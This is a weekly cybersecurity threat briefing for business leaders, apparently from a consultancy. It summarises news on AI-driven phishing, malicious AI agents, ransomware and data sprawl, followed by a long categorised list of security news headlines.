Executive Summary

This week’s stories highlight how AI is reshaping cyber threats, with malicious agents, deepfakes and automated phishing increasing both scale and sophistication. In particular, when AI agents are given their own credentials or identities, this increases the risks that are exploited by attackers. Business leaders must now consider AI-driven risks as part of their core governance responsibilities. Risks are further increased because of the growth of data held by businesses, including redundant or abandoned data.

We also report on the resurgence of classic attack methods like phishing and email compromise, now supercharged by generative AI. Ransomware remains a dominant threat, with attackers exploiting cyber insurance policies and even resorting to physical intimidation. European organisations are particularly exposed, and many still pay ransoms, which encourages repeat targeting. Research shows that business leaders have an inaccurate perception of their organisation’s readiness to recover from an incident.

The key theme here is the need for business leaders to be informed of the current and emerging threats to their business, and to know how to mitigate these risks through a strategy that they govern alongside their other risks. Contact us to discuss how to make this work proportionately in your organisation.

Enterprises are Not Prepared for a World of Malicious AI Agents

Palo Alto Networks CEO Nikesh Arora warns that most organisations are ill equipped to manage the growing number of AI agents accessing corporate systems. These non-human identities can act like employees, holding credentials and privileges that expand the attack surface. Existing identity and privileged access tools track only a fraction of users, leaving many AI agents unmonitored. This gap will worsen as both legitimate and malicious agents proliferate. A centralised management of user access and permissions is needed to prevent uncontrolled access and misuse.

Source: https://www.zdnet.com/article/enterprises-are-not-prepared-for-a-world-of-malicious-ai-agents/

The Phishing Renaissance, How AI Brought Back the Classics

Classic phishing methods such as credential theft and vendor impersonation are resurging because AI makes personalisation easy. Generative tools remove the grammatical errors that once revealed scams, allowing criminals to adapt tone and context for each target. Deepfakes and voice cloning add realism to social engineering, while business email compromise continues to succeed without malware. Human awareness and layered verification are essential as AI amplifies the effectiveness of old techniques.

Source: https://securityboulevard.com/2025/10/the-phishing-renaissance-how-ai-brought-back-the-classics/

‘Data Sprawl’ Is Now Your Security Team’s Biggest Headache – And It’s Only Going to Get Worse

Growth of data across cloud, hybrid and SaaS environments is overwhelming security teams. One-third of UK organisations saw data volumes surge by 30% or more in the past year and 41% of large enterprises now manage over a petabyte. Around 38% flag redundant or abandoned data as a security risk, while 85% of organisations globally report data loss incidents. The rise of generative AI and weak visibility are exacerbating the issue, and firms should embed privacy-by-design and governance before attackers exploit the chaos.

Source: https://www.itpro.com/security/data-sprawl-is-now-your-security-teams-biggest-headache-and-its-only-going-to-get-worse

Old Threats, New Consequences: 90% of Cyber Claims Stem from Email and Remote Access

Insurance data shows that most cyber claims originate from email and remote access breaches. Email accounted for 43% of incidents in 2024, with claim frequency rising 30% year on year. Fraud often begins with inbox compromise or near lookalike domains, and average illicit transfers reached $286,000. Generative AI is accelerating attacker success, highlighting that familiar entry points remain the most costly for organisations.

Source: https://www.csoonline.com/article/4081506/old-threats-new-consequences-90-of-cyber-claims-stem-from-email-and-remote-access.html

Survey: Organisations are Too Confident in Their Cyber Resiliency

A global study of 1,773 leaders finds widespread overconfidence in cyber resilience. While 95% believe they can recover from ransomware, 40% were attacked in the past year and only 15% fully restored their data. 45% paid ransoms, with 30% paying over $250,000. 44% report deepfake enabled attacks and many lack clear policies on generative AI. The findings reveal a gap between perceived and actual preparedness.

Source: https://securityboulevard.com/2025/11/survey-organizations-are-too-confident-in-their-cyber-resiliency/

Thousands Fall Victim to Ransomware as European Attacks Reach Record Highs - Here’s Why They’re So at Risk

Europe now accounts for almost 22% of global victims posted on leak sites since 2024, with more than 2,100 European organisations listed. Exposure is driven by lucrative sectors, GDPR penalties that can encourage payment and geopolitical spillover from the war in Ukraine. Average time from initial access to deployment is 35.5 hours, compressing response windows and increasing operational impact. Intelligence led defence and faster containment are essential.

Source: https://www.techradar.com/pro/security/thousands-fall-victim-to-ransomware-as-european-attacks-reach-record-highs-heres-why-theyre-so-at-risk

How Ransomware Attacks Leverage Cyber Insurance Policies

Attackers increasingly search for cyber insurance documents to shape negotiations. Knowledge of limits, coverage and approved vendors allows demands that appear reasonable relative to downtime and costs. Policies should be protected like confidential financial records, with strict access, secure storage, offline copies and staff awareness to prevent leverage during extortion.

Source: https://securityboulevard.com/2025/11/how-ransomware-attacks-leverage-cyber-insurance-policies/

Violent Cybercrime Surges in Europe Amid Big Payouts

Some cyber attackers are pairing online extortion with real world intimidation to force payment. Rising revenues and professionalisation are driving aggression, with threats extending beyond data leaks. Response plans should include physical safety considerations and coordination with law enforcement as pressure tactics escalate.

Source: https://www.theregister.com/2025/11/04/cybercriminals_increasingly_rely_on_violence/

Three of the Biggest Cybercrime Gangs Around Appear to Be Teaming Up - Which Could Be Bad News for All of Us

Scattered Spider, Lapsus$ and ShinyHunters have reportedly united under the new banner “Scattered Lapsus$ Hunters” (SLH). Operating via Telegram, the alliance combines social engineering, credential theft and data-leak extortion into a professionalised “Extortion-as-a-Service” model. The groups seek both profit and notoriety, marking a shift toward cybercrime branding that increases visibility and risk for global enterprises.

Source: https://www.techradar.com/pro/security/three-of-the-biggest-cybercrime-gangs-around-appear-to-be-teaming-up-which-could-be-bad-news-for-all-of-us

Google Says 2026 Will Be the Year AI Supercharges Cybercrime

Google forecasts that by 2026, AI will drive both attacks and defences. Adversaries will automate phishing, deepfakes and prompt injection exploits against large language models. A growing concern is unmonitored bots or scripts with system access that act without oversight; these hidden identities could move data or perform actions unseen by security teams. The report urges strict control, identity tracking and AI-led containment to counter this evolving threat.

Source: https://www.helpnetsecurity.com/2025/11/05/google-cybersecurity-forecast-2026/

Enterprises are Losing Track of the Devices Inside Their Networks

A study of 10 million devices across more than 700 organisations shows that two-thirds are not traditional IT assets such as servers or laptops. Instead, they include extended IoT devices like VoIP phones, cameras, point-of-sale systems and power supplies. On average, firms manage 164 device types, 1,629 vendors and 876 OS versions. With 40% of cameras containing known flaws and 3% exposed online, organisations must urgently regain visibility and control over every connected device.

Source: https://www.helpnetsecurity.com/2025/11/06/enterprise-xiot-devices-risk/

Britain ‘Highly Vulnerable’ to Russian Cyber Attacks, Warns Former Army Chief

Field Marshal Lord Houghton warns that Britain’s cyber defences are not yet fit for purpose and that the nation remains highly vulnerable to hostile cyber activity. Recent breaches affecting the Ministry of Defence and major contractors highlight deep weaknesses. He urges greater investment in AI and autonomous systems to boost military capability and calls for closer coordination between government, industry and the Armed Forces to strengthen resilience.

Source: https://www.telegraph.co.uk/news/2025/11/06/british-army-russian-attack-field-marshal-lord-houghton/

Governance, Risk and Compliance

82 percent of finserv organizations suffered a data breach in the last year - BetaNews

CISO Burnout – Epidemic, Endemic, or Simply Inevitable? - SecurityWeek

Survey: Organizations Are Too Confident in Their Cyber Resiliency - Security Boulevard

Financial services can't shake security debt - Help Net Security

Nearly Three-Quarters of US CISOs Faced Significant Cyber Incident in the Past Six Months, Research Finds - IT Security Guru

UK’s National Cyber Security Centre Releases 2025 Annual Review | Alston & Bird - JDSupra

Google Forecasts Rise of Cyber-Physical Attacks Targeting Europe - Infosecurity Magazine

Nation-State, Cyber and Hacktivist Threats Pummel Europe

Violent cybercrime surges in Europe amid big payouts • The Register

Firms prioritise AI and cyber security in tackling digital threats - CIR Magazine

The Next Evolution Of Cybersecurity Is Preemptive

Gartner just dropped its 2026 tech trends - and it's not all AI: Here's the list | ZDNET

To maximize their influence, CISOs need diverse skills | TechTarget

CISOs in court: Balancing cyber resilience and legal accountability | Computer Weekly

Threats

Ransomware, Extortion and Destructive Attacks

Three of the biggest cybercrime gangs around appear to be teaming up - which could be bad news for all of us | TechRadar

Three Infamous Cybercriminal Groups Form a New Alliance Dubbed 'Scattered LAPSUS$ Hunters' - Cyber Security News

When cyber professionals go rogue: A former ‘ransomware negotiator’ has been charged amid claims they attacked and extorted businesses | IT Pro

Cyber loot flows to Russia and its friends | Cybernews

What Makes Ransomware Groups Successful?

Rhysida ransomware exploits Microsoft certificate to slip malware past defenses | CSO Online

Cybersecurity experts charged with running BlackCat ransomware operation | CSO Online

Ransomware attacks are hitting European enterprises at record pace | IT Pro

Thousands fall victim to ransomware as European attacks reach record highs - here's why they're so at risk | TechRadar

New Beast Ransomware Actively Scans for Active SMB Port from Breached System to Spread Across Network

Leak Site Ransomware Victims Spike 13% in a Year - Infosecurity Magazine

Beware - ransomware gang is tricking victims with fake Microsoft Teams ads | TechRadar

How Ransomware Attacks Leverage Cyber Insurance Policies - Security Boulevard

DragonForce Cartel Emerges as Conti-Derived Ransomware Threat - Infosecurity Magazine

U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

Wipers from Russia’s most cut-throat hackers rain destruction on Ukraine - Ars Technica

Ukrainian allegedly involved in Conti ransomware attacks faces up to 25 years in jail | CyberScoop

Alleged Conti ransomware gang affiliate appears in Tennessee court after Ireland extradition | The Record from Recorded Future News

Ransomware Victims

Conduent January 2025 breach impacts 10M+ people

M&S cyberattack cost £136m but retailer ‘regaining momentum’ | News | The Grocer

Results: Cyber attack more than halved M&S first half profits - Retail Gazette

Hackers hit a Swiss bank, claiming 2.5TB of data | Cybernews

‘People have had to move house’: Inside the British Library, two years on from devastating cyber attack | The Independent

Qantas' digital and customer head steps down months after cyber breach, internal memo shows | Reuters

Knee-jerk corporate responses to data leaks protect brands like Qantas — but consumers are getting screwed

How a ransomware gang encrypted Nevada government's systems

Nevada Refused to Pay Cyberattack Ransom as Systems Sat Compromised for Months – DataBreaches.Net

Hackers threaten to leak data after breaching University of Pennsylvania to send mass emails | TechCrunch

Japanese retailer Askul confirms data leak after cyberattack claimed by Russia-linked group | The Record from Recorded Future News

Apache OpenOffice disputes data breach claims by ransomware gang

"Pay up or we share the tapes": Hackers target massage parlour clients in blackmail scheme

Oncology Institute Reports Cybersecurity Incident Impact - TipRanks.com

Phishing & Email Based Attacks

The Phishing Renaissance, How AI Brought Back the Classics - Security Boulevard

Old threats, new consequences: 90% of cyber claims stem from email and remote access | CSO Online

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

ClickFix malware attacks evolve with multi-OS support, video tutorials

How Phishing Kits Are Evading Detection & Ways to Beat Them | MSSP Alert

Is your business prepared for these growing phishing scams? | TechRadar

“I Paid Twice” Phishing Campaign Targets Booking.com - Infosecurity Magazine

Other Social Engineering

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

ClickFix malware attacks evolve with multi-OS support, video tutorials

In an AI World, Every Attack is a Social Engineering Attack - Security Boulevard

Is your business ready for a deepfake attack? 4 steps to take before it's too late | ZDNET

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

UK carriers to block spoofed phone numbers in fraud crackdown

SMS Fraud Losses Set to Decline 11% in 2026 - Infosecurity Magazine

Sora 2 Creates Believable Videos,Reality Checks Needed

AI makes holiday shopping scams harder to spot - BetaNews

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Fraud, Scams and Financial Crime

Europe's phone networks are drowning in fake calls - Help Net Security

Google Report Reveals How Text Scams Steal Your Data And Money

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

UK carriers to block spoofed phone numbers in fraud crackdown

SMS Fraud Losses Set to Decline 11% in 2026 - Infosecurity Magazine

AI makes holiday shopping scams harder to spot - BetaNews

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Experts warn AI tools are fueling a rise in scams targeting older adults - BetaNews

Artificial Intelligence

The Phishing Renaissance, How AI Brought Back the Classics - Security Boulevard

Ransomware Attack on European Organizations Surge as Hackers Leveraging AI-Tools for Attacks

Google says 2026 will be the year AI supercharges cybercrime - Help Net Security

Cybercrime To Hit Critical Supply Chains As AI Amplifies Global Risk, Google Warns | Scoop News

Cybercriminals Armed With AI Often Find Mid-Sized Businesses Are Sitting Ducks | Law.com

Enterprises are not prepared for a world of malicious AI agents | ZDNET

List of AI Tools Promoted by Threat Actors in Underground Forums and Their Capabilities

In an AI World, Every Attack is a Social Engineering Attack - Security Boulevard

Is your business ready for a deepfake attack? 4 steps to take before it's too late | ZDNET

Google uncovers malware using LLMs to operate and evade detection - Help Net Security

Malware Now Uses AI During Execution to Mutate and Collect Data, Google Warns - SecurityWeek

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

The cottage industry quietly manipulating chatbots’ replies

Sora 2 Creates Believable Videos,Reality Checks Needed

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Tech groups step up efforts to solve AI’s big security flaw

Microsoft Detects "SesameOp" Backdoor Using OpenAI's API as a Stealth Command Channel

Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection - Infosecurity Magazine

Microsoft: A key OpenAI API is being used for 'espionage' by bad actors | Mashable

AI makes holiday shopping scams harder to spot - BetaNews

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Researchers claim ChatGPT has a whole host of worrying security flaws - here's what they found | TechRadar

Malware

Google uncovers malware using LLMs to operate and evade detection - Help Net Security

New malware uses AI to adapt during attacks, report finds | The Record from Recorded Future News

ClickFix malware attacks evolve with multi-OS support, video tutorials

Weaponized Putty and Teams Ads Deliver Malware Allowing Hackers to Access Network

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Russian hackers abuse Hyper-V to hide malware in Linux VMs

Rhysida ransomware exploits Microsoft certificate to slip malware past defenses | CSO Online

Australia warns of BadCandy infections on unpatched Cisco devices

Malicious packages in npm evade dependency detection through invisible URL links: Report | CSO Online

Fake Solidity VSCode extension on Open VSX backdoors developers

Gootloader malware is back with new tricks after 7-month break

Millions of developers could be open to attack after critical flaw exploited - here's what we know | TechRadar

Operation SkyCloak Deploys Tor-Enabled OpenSSH Backdoor Targeting Defense Sectors

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

New HttpTroy Backdoor Poses as VPN Invoice in Targeted Cyberattack on South Korea

Russian hackers hit Windows machines via Linux VMs with new custom malware | TechRadar

37 years ago this week, the Morris worm infected 10% of the Internet within 24 hours — worm slithered out and sparked a new era in cybersecurity | Tom's Hardware

Mobile

Europe's phone networks are drowning in fake calls - Help Net Security

Google Report Reveals How Text Scams Steal Your Data And Money

Android Malware Mutes Alerts, Drains Crypto Wallets

Backdoored ‘secure’ messaging app leads to more arrests • The Register

Report finds 67% surge in Android mal... - Mobile World Live

Malicious Android apps on Google Play downloaded 42 million times

Xi Jinping jokes about backdoors in Xiaomi smartphones • The Register

Denial of Service/DoS/DDoS

Hacktivist-Driven DDoS Dominates Attacks on Public Sector - Infosecurity Magazine

Internet of Things – IoT

The Hidden Risks of Third-Party IoT Devices: What Organizations Need t - Infosecurity Magazine

Why millions of connected vehicles need automated cyber security | TechRadar

Enterprises are losing track of the devices inside their networks - Help Net Security

An 18-Year-Old Codebase Left Smart Buildings Wide Open

Connected devices may face mandatory security checks before you can use them

Data Breaches/Leaks

82 percent of finserv organizations suffered a data breach in the last year - BetaNews

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Conduent January 2025 breach impacts 10M+ people

Hackers hit a Swiss bank, claiming 2.5TB of data | Cybernews

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

‘People have had to move house’: Inside the British Library, two years on from devastating cyber attack | The Independent

Qantas' digital and customer head steps down months after cyber breach, internal memo shows | Reuters

Knee-jerk corporate responses to data leaks protect brands like Qantas — but consumers are getting screwed

Court reimposes original sentence for Capital One hacker | CyberScoop

Lawmakers say stolen police logins are exposing Flock surveillance cameras to hackers | TechCrunch

How the F5 breach, CISA job cuts, and a government shutdown are eroding U.S. cyber readiness | CyberScoop

Washington Post says it is among victims of cyber breach tied to Oracle software | Reuters

Software dev accidentally leaks Australian govt documents | Information Age | ACS

Data breach at major Swedish software supplier impacts 1.5 million

Data breach costs lead to 90% drop in operating profit at South Korean telecom giant | The Record from Recorded Future News

US Congressional Budget Office hit by cybersecurity incident | Reuters

Japanese retailer Askul confirms data leak after cyberattack claimed by Russia-linked group | The Record from Recorded Future News

Apache OpenOffice disputes data breach claims by ransomware gang

Media giant Nikkei reports data breach impacting 17,000 people

Hyundai AutoEver America data breach exposes SSNs, drivers licenses

Organised Crime & Criminal Actors

Three Infamous Cybercriminal Groups Form a New Alliance Dubbed 'Scattered LAPSUS$ Hunters' - Cyber Security News

Scattered Spider, ShinyHunters and LAPSUS$ Form Unified Collective - Infosecurity Magazine

DragonForce Cartel Emerges as Conti-Derived Ransomware Threat - Infosecurity Magazine

‘Scamming became the new farming’: inside India’s cybercrime villages | Cybercrime | The Guardian

Cyber surveillance of British businesses | Professional Security Magazine

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

Court reimposes original sentence for Capital One hacker | CyberScoop

Nine Arrested in €600M crypto laundering bust across Europe

Should We Celebrate the UN Convention against Cybercrime? Lessons from the UN Convention against Transnational Crime - Opinio Juris

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Firms at risk as Japan struggles to keep up with cybercrime amid rise of ransomware - The Mainichi

US Refuses to Sign UN Cybercrime Treaty

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

18 arrested in €300 million global credit card fraud scheme - Help Net Security

Android Malware Mutes Alerts, Drains Crypto Wallets

Hacker steals over $120 million from Balancer DeFi crypto protocol

Nine Arrested in €600M crypto laundering bust across Europe

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Insider Risk and Insider Threats

Employees keep finding new ways around company access controls - Help Net Security

Insurance

How Ransomware Attacks Leverage Cyber Insurance Policies - Security Boulevard

Is cyber on the verge of becoming uninsurable? | Insurance Business America

Supply Chain and Third Parties

Cybercrime To Hit Critical Supply Chains As AI Amplifies Global Risk, Google Warns | Scoop News

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack

Washington Post says it is among victims of cyber breach tied to Oracle software | Reuters

Software dev accidentally leaks Australian govt documents | Information Age | ACS

Data breach at major Swedish software supplier impacts 1.5 million

Open VSX rotates access tokens used in supply-chain malware attack

Software Supply Chain

Millions of developers could be open to attack after critical flaw exploited - here's what we know | TechRadar

Malicious packages in npm evade dependency detection through invisible URL links: Report | CSO Online

Cloud/SaaS

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

Microsoft Warns of 'Payroll Pirates' Hijacking HR SaaS Accounts to Steal Employee Salaries

Microsoft Teams really could be bad for your (security) health - hackers spoof bosses, send fake messages, and more | TechRadar

Researchers Just Revealed 4 Big Microsoft Teams Vulnerabilities

With each cloud outage, calls for government action grow louder | CyberScoop

EU and UK organizations ponder resilience after Azure outage • The Register

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

UK accused of being too slow to regulate cloud services providers

Oracle’s cloud strategy an increasingly risky bet | CIO

Outages

EU and UK organizations ponder resilience after Azure outage • The Register

Cloudflare’s new report exposes how the global internet still crumbles under fires, earthquakes, politics, and sheer bad luck | TechRadar

With each cloud outage, calls for government action grow louder | CyberScoop

Identity and Access Management

Employees keep finding new ways around company access controls - Help Net Security

Linux and Open Source

Russian hackers abuse Hyper-V to hide malware in Linux VMs

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

International Criminal Court dumps Microsoft Office • The Register

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Logging in as root on Linux? Here's why that disaster waiting to happen | ZDNET

Passwords, Credential Stuffing & Brute Force Attacks

The Louvre’s video surveillance had a shockingly weak password | Cybernews

Have I Been Pwned adds a billion new passwords to its database - gHacks Tech News

The Worst Password Of 2025 Is '123456' - Make Sure You Don't Use These

What are the most common passwords? No surprises here • The Register

Social Media

New phishing scam on LinkedIn is using fake board offers to steal corporate credentials: here's how | Mint

Cybercriminals have built a business on YouTube’s blind spots - Help Net Security

Malvertising

Beware - ransomware gang is tricking victims with fake Microsoft Teams ads | TechRadar

Weaponized Putty and Teams Ads Deliver Malware Allowing Hackers to Access Network

Training, Education and Awareness

What keeps phishing training from fading over time - Help Net Security

Study concludes cybersecurity training doesn’t work | KPBS Public Media

Regulations, Fines and Legislation

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

U.S. Sanctions 10 North Korean Entities for Laundering $12.7M in Crypto and IT Fraud

Report: 36% of companies do not know whether they are covered by NIS2 directive

Cyber Resilience Act: Overview for affected companies

With each cloud outage, calls for government action grow louder | CyberScoop

Should We Celebrate the UN Convention against Cybercrime? Lessons from the UN Convention against Transnational Crime - Opinio Juris

Connected devices may face mandatory security checks before you can use them

The US must not endorse Russia and China’s vision for cybersecurity

UK accused of being too slow to regulate cloud services providers

US Refuses to Sign UN Cybercrime Treaty

How the F5 breach, CISA job cuts, and a government shutdown are eroding U.S. cyber readiness | CyberScoop

Trump admin begins developing new cybersecurity strategy

Senate approves new leader for Army Cyber Command - Breaking Defense

Securing critical infrastructure: Why Europe’s risk-based regulations matter | Microsoft Security Blog

Old privacy laws create new risks for businesses - Help Net Security

Models, Frameworks and Standards

Report: 36% of companies do not know whether they are covered by NIS2 directive

Cyber Resilience Act: Overview for affected companies

Old privacy laws create new risks for businesses - Help Net Security

Data Protection

Old privacy laws create new risks for businesses - Help Net Security

‘Data sprawl’ is now your security team’s biggest headache – and it’s only going to get worse | IT Pro

Careers, Working in Cyber and Information Security

I was led down the wrong path into cybercrime as a teenager. Here’s what I would tell my younger self | From Play To Purpose | The Guardian

To maximize their influence, CISOs need diverse skills | TechTarget

'We're protecting UK from paralysing attack - and our salaries can be limitless' | Money News | Sky News

Starting Over in Cybersecurity: Advice I Wish I'd Had

Law Enforcement Action and Take Downs

EU Parliament committee votes to advance controversial Europol data sharing proposal | The Record from Recorded Future News

Operation Chargeback Uncovers €300m Fraud Scheme in 193 Countries - Infosecurity Magazine

Europe's phone networks are drowning in fake calls - Help Net Security

Backdoored ‘secure’ messaging app leads to more arrests • The Register

US cybersecurity experts indicted for BlackCat ransomware attacks

Nine Arrested in €600M crypto laundering bust across Europe

Court reimposes original sentence for Capital One hacker | CyberScoop

Ukrainian allegedly involved in Conti ransomware attacks faces up to 25 years in jail | CyberScoop

Alleged Conti ransomware gang affiliate appears in Tennessee court after Ireland extradition | The Record from Recorded Future News

US Refuses to Sign UN Cybercrime Treaty

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Misinformation, Disinformation and Propaganda

The cottage industry quietly manipulating chatbots’ replies

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Russia-linked 'Curly COMrades' turn to malicious virtual machines for digital spy campaigns | The Record from Recorded Future News

From hackers to tech companies: IHL and the involvement of civilians in ICT activities in armed conflict

Electronic Weapons: Russian Cyber War Against Germany

How nations build and defend their cyberspace capabilities - Help Net Security

Beyond Denial: Toward a Credible Cyber Deterrence Strategy • Stimson Center

Cyber-espionage campaign mirroring Sandworm TTPs hit Russian and Belarusian military - Help Net Security

Nation State Actors

SonicWall Confirms State-Sponsored Hackers Behind September Cloud Backup Breach

Cyber Physical Systems Face Rising Geopolitical Risks

China

Cyber loot flows to Russia and its friends | Cybernews

The US must not endorse Russia and China’s vision for cybersecurity

Chinese APT Uses 'Airstalk' Malware in Supply Chain Attacks - SecurityWeek

Nation-State Hackers Deploy New Airstalk Malware in Suspected Supply Chain Attack

Xi Jinping jokes about backdoors in Xiaomi smartphones • The Register

US telco confirms hackers breached systems in stealthy state-backed cyber campaign – and remained undetected for nearly a year | IT Pro

Chinese hackers scanning, exploiting Cisco ASA firewalls used by governments worldwide | The Record from Recorded Future News

US Space Force to Use Three Weapons To Jam Chinese Satellites Via Remote Control - Bloomberg

Germany Weighs Paying Deutsche Telekom to Replace Huawei Gear - Bloomberg

Finland to Tighten Huawei Ban in 5G Network on Security Grounds - Bloomberg

China-linked hackers exploited Lanscope flaw as a zero-day in attacks

Russia

Think tank finds infrastructure ‘inadequately protected against sabotage and cyber threats’ | New Civil Engineer

Britain ‘highly vulnerable’ to Russian cyber attacks, warns former Army chief

Cyber loot flows to Russia and its friends | Cybernews

Russian hackers hit Windows machines via Linux VMs with new custom malware | TechRadar

The US must not endorse Russia and China’s vision for cybersecurity

Electronic Weapons: Russian Cyber War Against Germany

The cottage industry quietly manipulating chatbots’ replies

Wipers from Russia’s most cut-throat hackers rain destruction on Ukraine - Ars Technica

Russia Wages War On The Internet In Ukraine, But Resistance Is Winning

Ukraine’s Security Service repels over 2,300 enemy cyberattacks in 2025 - Freedom

Offensive Cyber Operations and Combat Effectiveness After Ukraine | Lawfare

NATO's Crossed Swords cyber exercise gets underway in Tallinn | News | ERR

Russia arrests three suspected Meduza infostealer devs • The Register

Alleged Meduza Stealer malware admins arrested after hacking Russian org

Cyber-espionage campaign mirroring Sandworm TTPs hit Russian and Belarusian military - Help Net Security

Iran

UNK_SmudgedSerpent Targets Academics With Political Lures - Infosecurity Magazine

Iran's 'SmudgedSerpent APT Phishes US Policy Wonks

North Korea

Cyber loot flows to Russia and its friends | Cybernews

U.S. sanctioned North Korea bankers for laundering funds linked to cyberattacks and peapons program

Google Threat Report Links AI-powered Malware to DPRK Crypto Theft - Decrypt

Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence

Nation-State, Cyber and Hacktivist Threats Pummel Europe

Hacktivist-Driven DDoS Dominates Attacks on Public Sector - Infosecurity Magazine

Tools and Controls

Old threats, new consequences: 90% of cyber claims stem from email and remote access | CSO Online

Hackers Weaponize Windows Hyper-V to Hide Linux VM and Evade EDR Detection

Russian hackers abuse Hyper-V to hide malware in Linux VMs

NATO's Crossed Swords cyber exercise gets underway in Tallinn | News | ERR

AI Becomes Both Tool and Target in Cybersecurity

Former ransomware negotiators allegedly targeted US firms with ALPHV/BlackCat ransomware - Help Net Security

Survey: Organizations Are Too Confident in Their Cyber Resiliency - Security Boulevard

Financial services can't shake security debt - Help Net Security

Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks

Russian hackers host secret VMs on Windows | Cybernews

EU and UK organizations ponder resilience after Azure outage • The Register

Enterprises are losing track of the devices inside their networks - Help Net Security

Vibe-Coded Malicious VS Code Extension Found with Built-In Ransomware Capabilities

Vibe coding security risks and how to mitigate them | IT Pro

The Next Evolution Of Cybersecurity Is Preemptive

Browser detection and response fills gaps in security programs | TechTarget

AI can flag the risk, but only humans can close the loop - Help Net Security

As Cyber Threats Mount, Dark Web Monitoring Is Crucial for SMBs Says eMazzanti Technologies President Carl Mazzanti

Reports Published in the Last Week

UK’s National Cyber Security Centre Releases 2025 Annual Review | Alston & Bird - JDSupra

NCSC Annual Review 2025

Other News

Think tank finds infrastructure ‘inadequately protected against sabotage and cyber threats’ | New Civil Engineer

Zombie Projects Rise Again to Undermine Security

Louvre delayed Windows security updates ahead of burglary – Computerworld

Cybercriminals Exploit Remote Monitoring Tools to Infiltrate Logistics and Freight Networks

‘Data sprawl’ is now your security team’s biggest headache – and it’s only going to get worse | IT Pro

International Criminal Court dumps Microsoft Office • The Register

Europe's energy grid faces growing cyber threat • The Register

Europe eyes digital sovereignty sans big tech | TelecomTV

Shipping’s cyber reckoning - Splash247

Ofcom to Boost UK Telecoms Security by Working with Key Countries - ISPreview UK

'Greatest vulnerability': Australian Navy chief says protecting undersea cables is 'existential' - Breaking Defense

How can we keep our society and economy cyber secure? - New Statesman

How nations build and defend their cyberspace capabilities - Help Net Security

Totally Exposed at 30,000 Feet - Center for Democracy and Technology

Scottish Government launches refreshed cyber strategy

Cyber Physical Systems Face Rising Geopolitical Risks

Hospitals are running out of excuses for weak cyber hygiene - Help Net Security

The race to defend satellites from cyberattacks - SpaceNews

The Rising Tide of Cyber-Attacks Against the UK Water Sector | Fortra

Vulnerability Management

Zombie Projects Rise Again to Undermine Security

Louvre delayed Windows security updates ahead of burglary | CSO Online

UK dept spent £312M moving to Win 10 as support D-day hits • The Register

SolarWinds-Like Risk Lurks in Popular Installer Tool

Vulnerabilities

Researchers Just Revealed 4 Big Microsoft Teams Vulnerabilities

Update Chrome now: 20 security fixes just landed | Malwarebytes

Two Windows vulnerabilities, one a 0-day, are under active exploitation - Ars Technica

New Attack Combines Ghost SPNs and Kerberos Reflection to Elevate Privileges on SMB Servers

Cisco Warns of Hackers Actively Exploiting ASA and FTD 0-day RCE Vulnerability in the Wild

Old Linux Kernel flaw CVE-2024-1086 resurfaces in ransomware attacks

Australia warns of BadCandy infections on unpatched Cisco devices

Windows Graphics Vulnerabilities Allow Remote Attackers to Execute Arbitrary Code

New GDI Flaws Could Enable Remote Code Execution in Windows - Infosecurity Magazine

Android Update Patches Critical Remote Code Execution Flaw - SecurityWeek

Apple Patches Multiple Critical Vulnerabilities in iOS 26.1 and iPadOS 26.1

Cisco Warns of New Firewall Attack Exploiting CVE-2025-20333 and CVE-2025-20362

SolarWinds-Like Risk Lurks in Popular Installer Tool

Ongoing Ransomware Attacks Exploit Linux Vulnerability, CISA Warns

Hackers Exploit OneDrive.exe Through DLL Sideloading to Execute Arbitrary Code

Researchers Find ChatGPT Vulnerabilities That Let Attackers Trick AI Into Leaking Data

Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection - Infosecurity Magazine

Hackers exploit critical auth bypass flaw in JobMonster WordPress theme

Microsoft: Patch for WSUS flaw disabled Windows Server hotpatching

Critical UniFi OS Vulnerability Enables Remote Code Execution Attacks

Microsoft: October Windows updates trigger BitLocker recovery

